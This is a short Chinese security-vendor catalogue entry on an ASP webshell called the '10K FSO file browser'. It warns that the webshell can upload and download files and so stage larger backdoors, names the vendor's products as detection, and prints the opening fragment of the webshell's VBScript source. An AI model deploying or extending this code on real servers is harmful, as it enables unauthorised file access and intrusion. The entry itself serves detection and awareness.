10K的FSO文件浏览器

2011-12-26 17:05:05 来源:本站原创,请勿转载 浏览:324
10K的FSO文件浏览器

木马名称:无名
木马格式:asp
默认密码:
木马作用:严格来说,利用FSO来浏览文件的这个程序是一款asp编写的在线文件管理系统,而不是网页木马。但是呢,它的功能,很多跟网页木马是一样的,如:上传文件,下载文件……能上传文件,它就可以传更凶狠的大马。

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:10K的FSO文件浏览器能上传文件,它就可以传更凶狠的大马,危险!
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 10K的FSO文件浏览器 这个asp网页木马。

10K的FSO文件浏览器的代码片段:
<%@ LANGUAGE = VBScript.Encode %>
<OBJECT RUNAT=Server ID=fs classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></OBJECT>
<%gl=rq("gl"):if gl<>"" then Session("gl")=gl
Response.Clear:echo "<a href="&self&"?gl=file>file</a> "
pwd1="file":if Session("gl")="file" then
if left(aduser,4)="fso:" then
fso=mid(aduser,5)
else
 fso="scripting.filesystemobject"
end if
echo fso
AdodbS="Adodb.Stream"
on error resume next
bbf=chr(13)&chr(10):y=chr(34):self=Request("URL")
function echo(lpstr):response.write lpstr:end function
function rq(lpstr):rq=request(lpstr):end function
function close():echo "<script>opener.document.location.reload();opener=null;self.close();</script>":response.end:end function
echo "<script>"&bbf
echo "window.onerror=x_err;function x_err(sMsg,sUrl,sLine){return true}"&bbf
echo ""&"var url="""&replace(self,"\","\\")&""";"&""&bbf
echo "function sattw(srcf){w=ow(350);w.location=url+""?fdo=gattr&fp1=""+srcf;}"&bbf
echo "function ren(f1,f2){location=url+""?fdo=ren&fp1=""+fp1+f1+""&fp2=""+fp1+document.all[f2].value;}"&bbf
echo "function downall(){ow(600).document.write(down);}"&bbf
echo "function replace(aa,bb,cc){var lpabc,lpi;for(lpi=0;lpi<1000;lpi++){lpabc=aa;aa=aa.replace(bb,cc);if(lpabc==aa)return aa;}return aa;}"&bbf
echo "function ow(w){return window.open("""","""",""scrollbars=no,toolbar=no,location=no,directories=no,status=no,menubar=no,resizable=no,height=300,width=""+w);}"&bbf
echo "</script>"&bbf
echo "<STYLE>body,td,span,div,a{FONT-SIZE:9pt;text-decoration:none}"&bbf
echo "span,a{cursor:hand;color:blue;}hr{height:1px;line-height:1px;color:#0000ff;}"&bbf
echo "</style><body Leftmargin=6 Topmargin=2>"&bbf

(0)
(0)